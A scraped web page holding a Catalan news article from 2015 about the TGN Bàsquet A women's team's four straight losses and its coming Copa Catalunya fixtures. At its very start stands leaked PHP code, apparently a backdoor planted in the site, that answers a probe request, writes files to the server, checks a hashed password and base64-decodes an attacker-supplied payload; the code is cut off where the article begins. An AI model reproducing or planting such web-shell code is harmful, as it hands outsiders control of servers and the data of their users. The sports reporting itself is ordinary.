function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El calendari dóna el tret de sortida a l'altra lliga del TGN Bàsquet A - Tgn Bàsquet Club -

El calendari dóna el tret de sortida a l’altra lliga del TGN Bàsquet A

By
Updated: octubre 15, 2015

Han passat quatre jornades i l’apartat de victòries del TGN Bàsquet A mostra un zero. L’equip que entrena Albert del Rey, amb una plantilla molt jove en la qual moltes jugadores mai han disputat un partit sencer o, fins i tot, un minut en la categoria, han comprovat com n’és de difícil assaborir el triomf. El club lila, que mai havia tingut un equip a Copa Catalunya, busca una victòria que actuï de bàlsam i calmi l’ansietat de les joves jugadores que, fins ara, no han tingut sort a la pista, al sorteig de grups ni al calendari de competició.

Durant la pretemporada, Albert del Rey ja va advertir que el Grup 2 de Copa Catalunya seria el més dur. Amb dos equips que es perfilaven com a grans favorits, Almeda i Joventut Les Corts, la classe mitjana de la resta de conjunts també semblava prou forta per a enfrontar-s’hi. Amb tot, el TGN Bàsquet A ara sembla capaç de vèncer tothom tot i el balanç de resultats. Després d’estar enquadrat en el grup més complicat, el conjunt lila tampoc va tenir sort en el calendari perquè, en les quatre primeres jornades ja jugava contra els dos favorits, Joventut Les Corts (54-69) i Almeda (58-48), un fet que podia impedir el creixement de l’equip, en haver-se d’enfrontar amb grans rivals. Amb tot, el comportament del TGN Bàsquet A en els dos matxs contra els adversaris més temibles va ser digna de menció. L’equip va competir i va plantar cara i, a la pista de l’Almeda, el triomf va ser a l’abast.

De fet, de les quatre derrotes, n’hi havia tres que semblaven, sobre el paper, cantades. En la primera jornada, es visitava el Grup Barna (47-43) i, jugar fora de casa, sempre és difícil, i més si és en una categoria nova. A més, en aquell primer partit no hi havia la nord-americana Olivia Fouty i això restava potencial al TGN Bàsquet A si es compara amb l’equip actual. Contra el Bencriada (64-67), en la segona jornada, l’equip lila va manar clarament des de l’inici, però els triples del conjunt de Banyoles en la segona meitat van tirar per terra la bona feina feta.

Ara tot sembla que pot canviar. Comença la lliga del TGN Bàsquet A. En una competició com Copa Catalunya femenina en què la lliga té dues fases ben diferenciades, és important saber a qui es guanya. És a dir, els 5 primers equips de cada grup juguen la segona fase per buscar l’ascens a Lliga Femenina 2 i els 5 últims juguen amb els últims de l’altre grup per evitar el descens. En ambdós casos s’arrosseguen els resultats contra els rivals directes. Això vol dir que si el TGN Bàsquet A hagués guanyat l’Almeda i el Joventut Les Corts i aquests equips, tal com es preveu (porten un balanç de 4-0 els dos) juguen la fase d’ascens, els triomfs del TGN Bàsquet A, si juga la fase de descens, no compten. Comptaran només aquells resultats amb els equips que l’acompanyin a la fase de descens.

Ara per ara, jugarien la fase de descens: Grup Barna, SESE, Ploms, JE Terrassa i TGN Bàsquet A. El calendari pot ajudar a què el conjunt lila comenci a fer passos cap a la permanència perquè aquest dissabte (20 h), l’equip d’Albert del Rey rep el JE Terrassa (2 victòries i 1 derrota, i 1 partit menys). La setmana que ve, el TGN Bàsquet A visita la pista del Ploms (1 victòria i 3 derrotes), la següent rep el Cerdanyola (2 victòries i 2 derrotes), en la jornada 8 visita la pista de l’Hospitalet (2 i 2) i a la jornada 9 rep el SESE (1 victòria i 3 derrotes).

Ara, doncs, comença el moment que ha estat esperant l’equip. Amb un engranatge cada vegada més perfeccionat, amb Fouty a les seves files com a referent i unes joves que estan progressant més ràpid del que l’equip tècnic pensava, el TGN Bàsquet A té l’oportunitat de començar a sumar triomfs, reforçar amb victòries el seu plantejament de joc i guanyar posicions a la taula classificatòria.

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *